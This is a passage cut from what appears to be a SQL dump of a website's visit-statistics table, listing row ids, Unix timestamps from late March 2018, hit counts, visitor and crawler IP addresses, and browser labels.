178.77','chrome'),(227065,1522397983,1,1,0,0,'34.207.57.33','other'),(227066,1522397998,1,1,0,0,'141.8.142.74','other'),(227067,1522398020,2,2,0,0,'87.250.224.46','other'),(227068,1522398055,1,1,0,0,'216.244.66.237','other'),(227069,1522398217,1,1,0,0,'178.92.170.99','chrome'),(227070,1522398386,1,1,0,0,'8.29.198.25','other'),(227071,1522398910,1,0,1,0,'66.249.66.199',''),(227072,1522398997,1,1,0,0,'91.196.178.98','chrome'),(227073,1522399062,1,1,0,0,'34.207.57.33','other'),(227074,1522399419,2,2,0,0,'91.196.178.77','chrome'),(227075,1522399522,2,0,2,0,'66.249.66.201',''),(227076,1522399974,1,1,0,0,'141.8.142.74','other'),(227077,1522400059,1,1,0,0,'34.207.57.33','other'),(227078,1522400674,3,3,0,0,'216.244.66.237','other'),(227079,1522400865,1,1,0,0,'207.46.13.56','other'),(227080,1522401040,1,1,0,0,'34.207.57.33','other'),(227081,1522401235,2,2,0,0,'91.196.177.111','firefox'),(227082,1522401970,1,1,0,0,'34.207.57.33','other'),(227083,1522402279,1,1,0,0,'31.43.31.73','chrome'),(227084,1522402654,2,2,0,0,'130.180.220.62','chrome'),(227085,1522402722,7,7,0,0,'216.244.66.237','other'),(227086,1522402873,1,1,0,0,'34.207.57.33','other'),(227087,1522403133,1,1,0,0,'178.154.171.88','other'),(227088,1522403548,2,2,0,0,'141.8.142.74','other'),(227089,1522403767,2,2,0,0,'87.250.224.46','other'),(227090,1522403797,1,1,0,0,'216.244.66.246','other'),(227091,1522403802,1,1,0,0,'34.207.57.33','other'),(227092,1522404096,1,0,1,0,'66.249.66.199',''),(227093,1522404113,1,0,1,0,'66.249.66.195',''),(227094,1522404139,1,1,0,0,'80.252.155.198','chrome'),(227095,1522404304,1,1,0,0,'91.196.178.70','firefox'),(227096,1522404748,1,1,0,0,'34.207.57.33','other'),(227097,1522405063,1,1,0,0,'216.244.66.237','other'),(227098,1522405140,1,1,0,0,'95.132.134.76','chrome'),(227099,1522405267,1,1,0,0,'37.9.113.182','other'),(227100,1522405611,1,0,1,0,'66.249.66.201',''),(227101,1522405661,1,1,0,0,'34.207.57.33','other'),(227102,1522405821,1,0,1,0,'66.249.66.199',''),(227103,1522406623,1,1,0,0,'34.207.57.33','other'),(227104,1522406983,1,1,0,0,'178.158.244.235','chrome'),(227105,1522407447,1,1,0,0,'141.8.142.74','other'),(227106,1522407498,2,2,0,0,'216.244.66.237','other'),(227107,1522407666,1,1,0,0,'34.207.57.33','other'),(227108,1522408235,1,0,1,0,'66.249.66.201',''),(227109,1522408611,1,1,0,0,'34.207.57.33','other'),(227110,1522408783,3,3,0,0,'77.111.244.48','chrome'),(227111,1522408903,1,1,0,0,'80.252.155.198','chrome'),(227112,1522409222,1,1,0,0,'8.29.198.25','other'),(227113,1522409268,3,3,0,0,'91.196.178.77','chrome'),(227114,1522409272,4,4,0,0,'5.9.144.234','other'),(227115,1522409644,1,0,1,0,'66.249.66.199',''),(227116,1522409844,1,1,0,0,'216.244.66.237','other'),(227117,1522409902,2,2,0,0,'130.180.219.240','chrome'),(227118,1522409907,1,1,0,0,'34.207.57.33','other'),(227119,1522410462,1,1,0,0,'130.180.209.113','firefox'),(227120,1522410480,1,1,0,0,'91.196.177.46','chrome'),(227121,1522410867,1,1,0,0,'34.207.57.33','other'),(227122,1522411082,1,1,0,0,'157.55.39.220','other'),(227123,1522411237,1,1,0,0,'216.244.66.246','other'),(227124,1522411796,1,1,0,0,'216.244.66.237','other'),(227125,1522411802,1,0,1,0,'66.249.66.195',''),(227126,1522411811,1,0,1,0,'66.249.66.199',''),(227127,1522411849,1,1,0,0,'34.207.57.33','other'),(227128,1522412348,2,2,0,0,'77.111.244.67','chrome'),(227129,1522412427,1,1,0,0,'77.111.244.59','chrome'),(227130,1522412859,1,1,0,0,'34.207.57.33','other'),(227131,1522413302,1,1,0,0,'54.165.59.7','other'),(227132,1522413483,2,2,0,0,'216.244.66.237','other'),(227133,1522413509,1,1,0,0,'83.170.203.202','chrome'),(227134,1522413651,1,1,0,0,'66.249.66.156','chrome'),(227135,1522413809,1,0,1,0,'66.249.66.199',''),(227136,1522413886,1,1,0,0,'34.207.57.33','other'),(227137,1522414216,1,1,0,0,'213.200.34.100','firefox'),(227138,1522414417,1,1,0,0,'213.180.203.7','other'),(227139,1522414810,1,1,0,0,'34.207.57.33','other'),(227140,1522415299,1,1,0,0,'66.249.66.201','chrome'),(227141,1522415771,1,1,0,0,'34.207.57.33','other'),(227142,1522415866,2,2,0,0,'91.196.178.22','chrome'),(227143,1522416776,1,1,0,0,'34.207.57.33','other'),(227144,1522417709,1,1,0,0,'34.207.57.33','other'),(227145,1522418021,2,2,0,0,'216.244.66.237','other'),(227146,1522418394,1,1,0,0,'216.244.66.246','other'),(227147,1522418681,1,1,0,0,'188.230.43.254','other'),(227148,1522418746,1,1,0,0,'34.207.57.33','other'),(227149,1522419331,1,1,0,0,'87.250.224.46','other'),(227150,1522419335,1,1,0,0,'178.154.171.88','other'),(227151,1522419749,2,2,0,0,'216.244.66.237','other'),(227152,1522419776,1,1,0,0,'34.207.57.33','other'),(227153,1522420062,1,1,0,0,'8.29.198.26','other'),(227154,1522420394,1,0,1,0,'66.249.66.201',''),(227155,1522420635,1,0,1,0,'66.249.66.195',''),(227156,1522420647,2,0,2,0,'66.249.66.156',''),(227157,1522420666,2,0,2,0,'66.249.66.157',''),(227158,1522420703,1,1,0,0,'188.230.43.254','other'),(227159,1522420729,1,1,0,0,'34.207.57.33','other'),(227160,1522420830,1,1,0,0,'134.249.146.125','chrome'),(227161,1522421188,3,3,0,0,'216.244.66.237','other'),(227162,1522421329,1,1,0,0,'37.9.113.182','other'),(227163,1522421693,1,1,0,0,'34.207.57.33','other'),(227164,1522421803,1,1,0,0,'188.230.43.254','other'),(227165,1522422621,1,1,0,0,'34.207.57.33','other'),(227166,1522422643,1,1,0,0,'141.8.142.74','other'),(227167,1522422988,1,1,0,0,'188.230.43.254','other'),(227168,1522423639,1,1,0,0,'91.196.178.53','chrome'),(227169,1522423642,1,1,0,0,'34.207.57.33','other'),(227170,1522423762,1,1,0,0,'141.8.142.74','other'),(227171,1522424565,1,1,0,0,'34.207.57.33','other'),(227172,1522424574,1,1,0,0,'216.244.66.237','other'),(227173,1522424659,1,1,0,0,'207.46.13.29','other'),(227174,1522424723,1,1,0,0,'188.230.43.254','other'),(227175,1522424767,1,1,0,0,'178.154.200.41','other'),(227176,1522424854,1,1,0,0,'91.214.211.19','chrome'),(227177,1522425384,1,1,0,0,'141.8.142.74','other'),(227178,1522425584,1,1,0,0,'34.207.57.33','other'),(227179,1522425714,1,1,0,0,'178.154.200.41','other'),(227180,1522426180,1,1,0,0,'87.250.224.46','other'),(227181,1522426342,1,0,1,0,'66.249.66.195',''),(227182,1522426391,1,1,0,0,'141.8.142.74','other'),(227183,1522426492,1,1,0,0,'34.207.57.33','other'),(227184,1522426725,1,1,0,0,'188.230.43.254','other'),(227185,1522426892,1,1,0,0,'216.244.66.194','other'),(227186,1522427378,1,1,0,0,'207.46.13.214','other'),(227187,1522427430,1,1,0,0,'34.207.57.33','other'),(227188,1522428135,1,1,0,0,'54.89.27.130','other'),(227189,1522428267,1,1,0,0,'128.69.234.225','chrome'),(227190,1522428341,1,1,0,0,'34.207.57.33','other'),(227191,1522428347,1,0,1,0,'66.249.66.157',''),(227192,1522429058,2,2,0,0,'91.196.178.25','chrome'),(227193,1522429073,1,1,0,0,'54.89.27.130','other'),(227194,1522429084,1,0,1,0,'66.249.66.201',''),(227195,1522429282,1,1,0,0,'216.244.66.246','other'),(227196,1522429294,2,2,0,0,'178.92.170.128','chrome'),(227197,1522429321,1,1,0,0,'34.207.57.33','other'),(227198,1522429474,1,1,0,0,'109.169.211.183','chrome'),(227199,1522429684,1,1,0,0,'77.111.244.27','chrome'),(227200,1522429926,3,3,0,0,'216.244.66.237','other'),(227201,1522430067,1,1,0,0,'54.89.27.130','other'),(227202,1522430229,1,1,0,0,'34.207.57.33','other'),(227203,1522430908,1,1,0,0,'8.29.198.25','other'),(227204,1522431057,1,1,0,0,'54.89.27.130','other'),(227205,1522431178,1,1,0,0,'34.207.57.33','other'),(227206,1522431317,1,1,0,0,'107.167.107.241','other'),(227207,1522431974,1,1,0,0,'54.89.27.130','other'),(227208,1522432024,1,1,0,0,'216.244.66.237','other'),(227209,1522432138,1,1,0,0,'34.207.57.33','other'),(227210,1522432225,4,4,0,0,'148.251.22.254','other'),(227211,1522432331,1,1,0,0,'95.132.40.19','firefox'),(227212,1522432365,2,2,0,0,'87.250.224.46','other'),(227213,1522432366,1,1,0,0,'141.8.142.74','other'),(227214,1522432719,1,0,1,0,'66.249.66.195',''),(227215,1522432810,2,2,0,0,'178.92.170.128','chrome'),(227216,1522433112,1,1,0,0,'34.207.57.33','other'),(227217,1522433302,1,1,0,0,'141.8.142.74','other'),(227218,1522433820,1,1,0,0,'178.154.200.41','other'),(227219,1522433956,1,1,0,0,'180.76.15.147','other'),(227220,1522434176,1,1,0,0,'34.207.57.33','other'),(227221,1522434281,2,2,0,0,'141.8.142.74','other'),(227222,1522435118,1,1,0,0,'34.207.57.33','other'),(227223,1522435395,2,2,0,0,'216.244.66.237','other'),(227224,1522435804,1,0,1,0,'66.249.66.199',''),(227225,1522436032,1,1,0,0,'91.196.178.61','chrome'),(227226,1522436133,1,1,0,0,'34.207.57.33','other'),(227227,1522436154,2,2,0,0,'141.8.142.74','other'),(227228,1522436191,3,3,0,0,'178.154.171.88','other'),(227229,1522436490,2,2,0,0,'87.250.224.46','other'),(227230,1522437040,1,1,0,0,'34.207.57.33','other'),(227231,1522437249,1,0,1,0,'66.249.66.201',''),(227232,1522437400,1,1,0,0,'54.89.27.130','other'),(227233,1522437409,1,1,0,0,'157.55.39.220','other'),(227234,1522437556,1,1,0,0,'87.250.224.46','other'),(227235,1522437618,2,2,0,0,'141.8.142.74','other'),(227236,1522437756,1,1,0,0,'157.55.39.104','other'),(227237,1522437836,1,1,0,0,'178.154.171.88','other'),(227238,1522437957,1,1,0,0,'34.207.57.33','other'),(227239,1522438465,1,1,0,0,'54.89.27.130','other'),(227240,1522438871,1,1,0,0,'216.244.66.194','other'),(227241,1522438929,1,1,0,0,'34.207.57.33','other'),(227242,1522439231,1,1,0,0,'87.250.224.46','other'),(227243,1522439733,1,1,0,0,'54.89.27.130','other'),(227244,1522439905,1,1,0,0,'34.207.57.33','other'),(227245,1522440149,2,2,0,0,'216.244.66.237','other'),(227246,1522440826,1,0,1,0,'66.249.66.201',''),(227247,1522440845,1,1,0,0,'34.207.57.33','other'),(227248,1522441082,1,1,0,0,'54.89.27.130','other'),(227249,1522441185,1,1,0,0,'37.9.113.100','other'),(227250,1522441218,1,1,0,0,'91.209.11.236','other'),(227251,1522441751,1,1,0,0,'8.29.198.26','other'),(227252,1522441822,1,1,0,0,'34.207.57.33','other'),(227253,1522442191,1,1,0,0,'94.178.106.35','chrome'),(227254,1522442395,1,1,0,0,'54.89.27.130','other'),(227255,1522442796,1,1,0,0,'34.207.57.33','other'),(227256,1522443123,1,1,0,0,'178.154.171.88','other'),(227257,1522443340,1,1,0,0,'54.89.27.130','other'),(227258,1522443649,1,1,0,0,'37.73.247.58','other'),(227259,1522443899,1,1,0,0,'34.207.57.33','other'),(227260,1522444106,1,1,0,0,'141.8.142.74','other'),(227261,1522444387,1,1,0,0,'54.89.27.130','other'),(227262,1522444479,1,1,0,0,'178.154.171.88','other'),(227263,1522444488,1,1,0,0,'216.244.66.237','other'),(227264,1522444786,1,1,0,0,'54.165.59.7','other'),(227265,1522444973,1,1,0,0,'34.207.57.33','other'),(227266,1522445374,1,1,0,0,'151.62.21.170','chrome'),(227267,1522445471,1,1,0,0,'54.89.27.130','other'),(227268,1522445897,1,1,0,0,'216.244.66.246','other'),(227269,1522445917,2,2,0,0,'141.8.142.74','other'),(227270,1522445949,1,1,0,0,'216.244.66.237','other'),(227271,1522446008,1,1,0,0,'34.207.57.33','other'),(227272,1522446204,1,1,0,0,'54.165.59.7','other'),(227273,1522446390,1,1,0,0,'54.86.64.190','other'),(227274,1522446520,1,1,0,0,'52.23.244.253','other'),(227275,1522446569,1,1,0,0,'54.89.27.130','other'),(227276,1522447162,1,1,0,0,'34.207.57.33','other'),(227277,1522447297,1,1,0,0,'54.86.64.190','other'),(227278,1522447445,1,1,0,0,'52.23.244.253','other'),(227279,1522447532,1,1,0,0,'216.244.66.237','other'),(227280,1522447628,1,1,0,0,'54.89.27.130','other'),(227281,1522448138,1,1,0,0,'34.207.57.33','other'),(227282,1522448184,1,1,0,0,'91.196.178.103','chrome'),(227283,1522448224,1,1,0,0,'54.86.64.190','other'),(227284,1522448348,1,1,0,0,'52.23.244.253','other'),(227285,1522448682,1,1,0,0,'54.89.27.130','other'),(227286,1522448717,1,0,1,0,'66.249.64.30',''),(227287,1522449085,1,1,0,0,'34.207.57.33','other'),(227288,1522449131,1,0,1,0,'66.249.64.29',''),(227289,1522449207,1,1,0,0,'54.86.64.190','other'),(227290,1522449266,1,1,0,0,'52.23.244.253','other'),(227291,1522449447,1,1,0,0,'141.8.142.74','other'),(227292,1522449707,1,1,0,0,'54.89.27.130','other'),(227293,1522450052,1,1,0,0,'34.207.57.33','other'),(227294,1522450136,1,1,0,0,'54.86.64.190','other'),(227295,1522450171,1,1,0,0,'52.23.244.253','other'),(227296,1522450637,1,1,0,0,'54.89.27.130','other'),(227297,1522451002,1,1,0,0,'216.244.66.194','other'),(227298,1522451041,1,1,0,0,'54.86.64.190','other'),(227299,1522451056,1,1,0,0,'34.207.57.33','other'),(227300,1522451076,1,1,0,0,'52.23.244.253','other'),(227301,1522451214,1,0,1,0,'66.249.64.30',''),(227302,1522451437,2,2,0,0,'141.8.142.74','other'),(227303,1522451987,1,1,0,0,'52.23.244.253','other'),(227304,1522451992,1,1,0,0,'54.89.27.130','other'),(227305,1522452026,1,1,0,0,'54.86.64.190','other'),(227306,1522452166,1,1,0,0,'34.207.57.33','other'),(227307,1522452590,1,1,0,0,'8.29.198.27','other'),(227308,1522452918,1,1,0,0,'52.23.244.253','other'),(227309,1522452927,1,1,0,0,'54.86.64.190','other'),(227310,1522453076,1,1,0,0,'54.89.27.130','other'),(227311,1522453094,1,1,0,0,'34.207.57.33','other'),(227312,1522453321,1,1,0,0,'46.188.24.252','msie'),(227313,1522453517,2,2,0,0,'141.8.142.74','other'),(227314,1522453701,1,1,0,0,'216.244.66.237','other'),(227315,1522453844,1,1,0,0,'54.86.64.190','other'),(227316,1522453846,1,1,0,0,'52.23.244.253','other'),(227317,1522454026,1,1,0,0,'34.207.57.33','other'),(227318,1522454043,1,1,0,0,'54.89.27.130','other'),(227319,1522454242,16,16,0,0,'94.73.150.169','other'),(227320,1522454251,10,10,0,0,'94.73.150.169','opera'),(227321,1522454771,1,1,0,0,'54.86.64.190','other'),(227322,1522454822,1,1,0,0,'52.23.244.253','other'),(227323,1522454947,1,1,0,0,'54.89.27.130','other'),(227324,1522455054,1,1,0,0,'34.207.57.33','other'),(227325,1522455294,3,3,0,0,'216.244.66.237','other'),(227326,1522455526,1,1,0,0,'157.55.39.222','other'),(227327,1522455609,1,1,0,0,'178.154.171.88','other'),(227328,1522455682,1,1,0,0,'54.86.64.190','other'),(227329,1522455723,1,1,0,0,'52.23.244.253','other'),(227330,1522455950,1,1,0,0,'54.89.27.130','other'),(227331,1522456014,1,1,0,0,'34.207.57.33','other'),(227332,1522456587,1,1,0,0,'54.86.64.190','other'),(227333,1522456780,1,1,0,0,'52.23.244.253','other'),(227334,1522457026,1,1,0,0,'217.69.133.2','other'),(227335,1522457096,1,1,0,0,'54.89.27.130','other'),(227336,1522457164,1,1,0,0,'34.207.57.33','other'),(227337,1522457233,1,1,0,0,'217.69.134.178','other'),(227338,1522457506,1,1,0,0,'54.86.64.190','other'),(227339,1522457683,1,1,0,0,'52.23.244.253','other'),(227340,1522457782,1,1,0,0,'217.69.134.183','other'),(227341,1522458083,2,0,2,0,'66.249.64.28',''),(227342,1522458112,1,0,1,0,'66.249.64.29',''),(227343,1522458150,1,1,0,0,'54.89.27.130','other'),(227344,1522458154,1,1,0,0,'34.207.57.33','other'),(227345,1522458208,2,2,0,0,'141.8.142.74','other'),(227346,1522458288,2,2,0,0,'216.244.66.237','other'),(227347,1522458414,1,1,0,0,'54.86.64.190','other'),(227348,1522458711,1,1,0,0,'52.23.244.253','other'),(227349,1522459130,1,1,0,0,'34.207.57.33','other'),(227350,1522459331,1,1,0,0,'54.86.64.190','other'),(227351,1522459627,3,3,0,0,'54.165.59.7','other'),(227352,1522459686,1,1,0,0,'52.23.244.253','other'),(227353,1522460042,1,1,0,0,'34.207.57.33','other'),(227354,1522460257,1,1,0,0,'54.86.64.190','other'),(227355,1522460507,1,1,0,0,'46.101.53.66','chrome'),(227356,1522460592,1,1,0,0,'52.23.244.253','other'),(227357,1522461015,1,1,0,0,'34.207.57.33','other'),(227358,1522461174,1,1,0,0,'54.86.64.190','other'),(227359,1522461513,1,1,0,0,'52.23.244.253','other'),(227360,1522462092,1,1,0,0,'54.86.64.190','other'),(227361,1522462132,1,1,0,0,'34.207.57.33','other'),(227362,1522462241,1,1,0,0,'90.161.33.250','chrome'),(227363,1522462431,1,1,0,0,'52.23.244.253','other'),(227364,1522462560,1,1,0,0,'87.250.224.85','other'),(227365,1522462679,1,1,0,0,'91.209.11.236','other'),(227366,1522462824,1,1,0,0,'157.55.39.222','other'),(227367,1522463012,1,1,0,0,'54.86.64.190','other'),(227368,1522463169,3,3,0,0,'216.244.66.237','other'),(227369,1522463213,1,1,0,0,'34.207.57.33','other'),(227370,1522463362,1,1,0,0,'52.23.244.253','other'),(227371,1522463438,1,1,0,0,'8.29.198.26','other'),(227372,1522463439,1,1,0,0,'5.45.207.83','other'),(227373,1522463938,1,1,0,0,'54.86.64.190','other'),(227374,1522463976,1,1,0,0,'54.89.27.130','other'),(227375,1522464161,1,1,0,0,'34.207.57.33','other'),(227376,1522464284,1,1,0,0,'52.23.244.253','other'),(227377,1522464796,1,0,1,0,'66.249.64.28',''),(227378,1522464857,2,2,0,0,'54.86.64.190','other'),(227379,1522464959,6,6,0,0,'216.244.66.237','other'),(227380,1522465080,1,1,0,0,'34.207.57.33','other'),(227381,1522465220,1,1,0,0,'52.23.244.253','other'),(227382,1522465420,1,1,0,0,'37.9.113.115','other'),(227383,1522465458,1,1,0,0,'141.8.142.74','other'),(227384,1522465774,1,1,0,0,'54.86.64.190','other'),(227385,1522465860,2,2,0,0,'216.244.66.237','other'),(227386,1522466135,1,1,0,0,'52.23.244.253','other'),(227387,1522466156,1,1,0,0,'34.207.57.33','other'),(227388,1522466614,13,13,0,0,'148.251.234.35','other'),(227389,1522466658,1,1,0,0,'87.250.224.46','other'),(227390,1522466696,1,1,0,0,'54.86.64.190','other'),(227391,1522467050,1,1,0,0,'52.23.244.253','other'),(227392,1522467183,1,1,0,0,'34.207.57.33','other'),(227393,1522467487,1,1,0,0,'207.46.13.29','other'),(227394,1522467609,1,1,0,0,'54.86.64.190','other'),(227395,1522467738,1,1,0,0,'180.76.15.20','other'),(227396,1522467935,1,1,0,0,'178.154.171.88','other'),(227397,1522467976,1,1,0,0,'52.23.244.253','other'),(227398,1522468279,1,1,0,0,'34.207.57.33','other'),(227399,1522468539,1,1,0,0,'54.86.64.190','other'),(227400,1522468893,1,1,0,0,'52.23.244.253','other'),(227401,1522469026,2,2,0,0,'216.244.66.237','other'),(227402,1522469130,1,1,0,0,'141.8.142.74','other'),(227403,1522469337,1,1,0,0,'34.207.57.33','other'),(227404,1522469462,1,1,0,0,'54.86.64.190','other'),(227405,1522470229,1,1,0,0,'157.55.39.104','other'),(227406,1522470246,1,1,0,0,'34.207.57.33','other'),(227407,1522470379,1,1,0,0,'54.86.64.190','other'),(227408,1522470577,3,3,0,0,'216.244.66.237','other'),(227409,1522471075,1,1,0,0,'141.8.142.74','other'),(227410,1522471163,1,1,0,0,'34.207.57.33','other'),(227411,1522471323,1,1,0,0,'54.86.64.190','other'),(227412,1522471541,1,1,0,0,'180.76.15.147','other'),(227413,1522471687,1,1,0,0,'157.55.39.220','other'),(227414,1522471978,1,1,0,0,'180.76.15.140','other'),(227415,1522472124,1,1,0,0,'34.207.57.33','other'),(227416,1522472135,2,2,0,0,'216.244.66.237','other'),(227417,1522472175,1,1,0,0,'87.250.224.46','other'),(227418,1522472278,1,1,0,0,'54.86.64.190','other'),(227419,1522473050,1,1,0,0,'34.207.57.33','other'),(227420,1522473236,1,1,0,0,'54.86.64.190','other'),(227421,1522474097,1,1,0,0,'34.207.57.33','other'),(227422,1522474151,1,1,0,0,'54.86.64.190','other'),(227423,1522474279,1,1,0,0,'8.29.198.25','other'),(227424,1522474790,1,1,0,0,'35.226.23.240','other'),(227425,1522475070,1,1,0,0,'34.207.57.33','other'),(227426,1522475306,2,2,0,0,'54.86.64.190','other'),(227427,1522475436,1,1,0,0,'216.244.66.237','other'),(227428,1522476055,1,1,0,0,'34.207.57.33','other'),(227429,1522476381,1,1,0,0,'54.86.64.190','other'),(227430,1522476798,2,2,0,0,'178.154.171.88','other'),(227431,1522477000,1,1,0,0,'216.244.66.237','other'),(227432,1522477160,1,1,0,0,'34.207.57.33','other'),(227433,1522477459,1,1,0,0,'54.86.64.190','other'),(227434,1522478183,1,1,0,0,'34.207.57.33','other'),(227435,1522478392,1,1,0,0,'216.244.66.237','other'),(227436,1522478544,1,1,0,0,'54.86.64.190','other'),(227437,1522479246,2,2,0,0,'141.8.142.74','other'),(227438,1522479739,1,1,0,0,'54.86.64.190','other'),(227439,1522481052,3,3,0,0,'141.8.142.74','other'),(227440,1522481438,2,2,0,0,'54.86.64.190','other'),(227441,1522481497,5,5,0,0,'216.244.66.237','other'),(227442,1522482706,1,1,0,0,'54.86.64.190','other'),(227443,1522483190,1,1,0,0,'87.250.224.46','other'),(227444,1522483313,1,1,0,0,'216.244.66.237','other'),(227445,1522483349,2,2,0,0,'37.54.114.62','chrome'),(227446,1522484192,1,1,0,0,'157.55.39.220','other'),(227447,1522484357,2,2,0,0,'54.86.64.190','other'),(227448,1522484412,2,2,0,0,'95.213.141.126','opera'),(227449,1522484874,1,1,0,0,'216.244.66.237','other'),(227450,1522484933,2,2,0,0,'141.8.142.74','other'),(227451,1522485118,1,1,0,0,'8.29.198.25','other'),(227452,1522485530,1,1,0,0,'87.250.224.46','other'),(227453,1522485559,1,1,0,0,'54.86.64.190','other'),(227454,1522486117,1,1,0,0,'157.55.39.220','other'),(227455,1522486241,11,11,0,0,'193.70.43.29','other'),(227456,1522486739,2,2,0,0,'178.154.171.88','other'),(227457,1522486741,2,2,0,0,'54.86.64.190','other'),(227458,1522487016,1,1,0,0,'141.8.142.74','other'),(227459,1522487689,1,1,0,0,'54.86.64.190','other'),(227460,1522488060,1,1,0,0,'216.244.66.237','other'),(227461,1522488261,1,1,0,0,'34.207.57.33','other'),(227462,1522488697,2,2,0,0,'54.86.64.190','other'),(227463,1522488947,1,0,1,0,'66.249.64.29',''),(227464,1522489030,1,1,0,0,'178.154.171.4','other'),(227465,1522489184,1,1,0,0,'141.8.132.22','other'),(227466,1522489340,1,1,0,0,'34.207.57.33','other'),(227467,1522489861,2,2,0,0,'54.86.64.190','other'),(227468,1522489868,1,1,0,0,'216.244.66.237','other'),(227469,1522489935,2,2,0,0,'178.154.171.55','other'),(227470,1522490027,1,1,0,0,'87.250.224.85','other'),(227471,1522490030,1,1,0,0,'141.8.142.29','other'),(227472,1522490993,1,1,0,0,'5.45.207.82','other'),(227473,1522491527,1,1,0,0,'54.86.64.190','other'),(227474,1522492191,2,2,0,0,'216.244.66.237','other'),(227475,1522492222,2,2,0,0,'78.111.185.199','chrome'),(227476,1522492499,1,1,0,0,'194.187.216.43','chrome'),(227477,1522492531,1,1,0,0,'141.8.142.152','other'),(227478,1522492676,1,0,1,0,'66.249.64.30',''),(227479,1522492899,2,2,0,0,'54.86.64.190','other'),(227480,1522493420,1,1,0,0,'178.154.171.88','other'),(227481,1522493841,1,1,0,0,'216.244.66.194','other'),(227482,1522494040,1,1,0,0,'185.132.251.128','opera'),(227483,1522494419,1,1,0,0,'54.86.64.190','other'),(227484,1522494896,1,1,0,0,'153.3.59.247','msie'),(227485,1522495332,1,1,0,0,'178.154.171.88','other'),(227486,1522495615,1,1,0,0,'157.55.39.220','other'),(227487,1522495952,1,1,0,0,'8.29.198.26','other'),(227488,1522496937,2,2,0,0,'141.8.142.74','other'),(227489,1522497023,2,2,0,0,'54.86.64.190','other'),(227490,1522497801,1,1,0,0,'157.55.39.220','other'),(227491,1522498546,1,1,0,0,'54.86.64.190','other'),(227492,1522499136,1,1,0,0,'207.46.13.29','other'),(227493,1522499513,1,1,0,0,'54.86.64.190','other'),(227494,1522500358,1,1,0,0,'91.209.11.236','other'),(227495,1522500428,1,1,0,0,'216.244.66.237','other'),(227496,1522500461,1,1,0,0,'87.250.224.46','other'),(227497,1522500941,1,1,0,0,'54.86.64.190','other'),(227498,1522501556,1,1,0,0,'37.9.113.115','other'),(227499,1522501869,4,4,0,0,'216.244.66.237','other'),(227500,1522501987,1,1,0,0,'54.86.64.190','other'),(227501,1522503019,1,0,1,0,'66.249.64.30',''),(227502,1522503444,1,1,0,0,'54.86.64.190','other'),(227503,1522503625,1,1,0,0,'216.244.66.246','other'),(227504,1522504554,1,1,0,0,'54.86.64.190','other'),(227505,1522505115,1,1,0,0,'216.244.66.237','other'),(227506,1522505731,1,1,0,0,'54.86.64.190','other'),(227507,1522505847,1,1,0,0,'180.76.15.148','other'),(227508,1522506538,4,4,0,0,'216.244.66.237','other'),(227509,1522506802,1,1,0,0,'8.29.198.26','other'),(227510,1522507321,1,1,0,0,'54.86.64.190','other'),(227511,1522508500,1,1,0,0,'95.28.171.164','msie'),(227512,1522508870,1,1,0,0,'54.86.64.190','other'),(227513,1522509248,2,2,0,0,'178.92.170.128','chrome'),(227514,1522509529,1,1,0,0,'37.73.214.231','firefox'),(227515,1522509778,1,1,0,0,'216.244.66.237','other'),(227516,1522510314,1,1,0,0,'95.132.52.144','chrome'),(227517,1522510651,1,1,0,0,'54.86.64.190','other'),(227518,1522510996,1,1,0,0,'141.8.142.74','other'),(227519,1522512362,1,0,1,0,'66.249.64.29',''),(227520,1522512968,1,1,0,0,'193.201.224.228','chrome'),(227521,1522513169,1,1,0,0,'87.250.224.77','other'),(227522,1522513975,1,1,0,0,'91.196.178.131','chrome'),(227523,1522514325,1,1,0,0,'141.8.142.74','other'),(227524,1522514549,2,2,0,0,'216.244.66.246','other'),(227525,1522514771,1,1,0,0,'216.244.66.237','other'),(227526,1522514949,1,1,0,0,'54.86.64.190','other'),(227527,1522515616,1,1,0,0,'207.46.13.29','other'),(227528,1522515862,1,1,0,0,'216.244.66.237','other'),(227529,1522516005,1,1,0,0,'52.91.126.226','other'),(227530,1522516910,1,1,0,0,'52.91.126.226','other'),(227531,1522517670,1,1,0,0,'8.29.198.27','other'),(227532,1522517911,1,1,0,0,'52.91.126.226','other'),(227533,1522518175,1,1,0,0,'54.86.64.190','other'),(227534,1522518518,1,1,0,0,'37.73.229.223','chrome'),(227535,1522519129,6,6,0,0,'216.244.66.237','other'),(227536,1522519151,1,1,0,0,'91.196.178.82','firefox'),(227537,1522519861,1,0,1,0,'66.249.69.41',''),(227538,1522520833,1,1,0,0,'216.244.66.237','other'),(227539,1522521216,1,1,0,0,'216.244.66.194','other'),(227540,1522521981,12,12,0,0,'23.237.4.26','other'),(227541,1522522133,1,1,0,0,'178.154.171.88','other'),(227542,1522522784,1,0,1,0,'66.249.69.39',''),(227543,1522523517,1,0,1,0,'66.249.69.89',''),(227544,1522523707,1,1,0,0,'52.86.124.62','other'),(227545,1522524074,1,1,0,0,'216.244.66.237','other'),(227546,1522524655,1,1,0,0,'52.86.124.62','other'),(227547,1522524936,1,0,1,0,'66.249.69.41',''),(227548,1522524992,1,1,0,0,'35.226.23.240','other'),(227549,1522525648,1,1,0,0,'52.86.124.62','other'),(227550,1522525745,1,1,0,0,'216.244.66.237','other'),(227551,1522525940,1,1,0,0,'95.108.141.76','chrome'),(227552,1522526568,1,1,0,0,'52.86.124.62','other'),(227553,1522526602,1,1,0,0,'141.8.142.167','other'),(227554,1522526727,1,1,0,0,'217.69.134.175','other'),(227555,1522526742,1,1,0,0,'217.69.134.182','other'),(227556,1522526755,2,2,0,0,'217.69.134.174','other'),(227557,1522526767,2,2,0,0,'217.69.133.3','other'),(227558,1522526780,1,1,0,0,'217.69.134.188','other'),(227559,1522526795,2,2,0,0,'217.69.134.154','other'),(227560,1522526812,1,1,0,0,'217.69.134.200','other'),(227561,1522526837,1,1,0,0,'217.69.134.183','other'),(227562,1522526934,2,2,0,0,'217.69.134.155','other'),(227563,1522527121,1,1,0,0,'217.69.134.177','other'),(227564,1522527471,1,1,0,0,'52.86.124.62','other'),(227565,1522527600,1,1,0,0,'217.69.134.178','other'),(227566,1522527679,1,1,0,0,'217.69.133.203','other'),(227567,1522527762,1,1,0,0,'217.69.134.183','other'),(227568,1522527860,1,1,0,0,'217.69.133.6','other'),(227569,1522527941,1,1,0,0,'217.69.133.2','other'),(227570,1522528057,1,1,0,0,'217.69.133.194','other'),(227571,1522528381,1,1,0,0,'52.86.124.62','other'),(227572,1522528517,1,1,0,0,'8.29.198.27','other'),(227573,1522528983,1,1,0,0,'157.55.39.220','other'),(227574,1522529284,1,1,0,0,'52.86.124.62','other'),(227575,1522529783,2,2,0,0,'216.244.66.237','other'),(227576,1522530208,1,1,0,0,'52.86.124.62','other'),(227577,1522530408,1,1,0,0,'141.8.142.74','other'),(227578,1522531133,1,1,0,0,'52.86.124.62','other'),(227579,1522531875,1,0,1,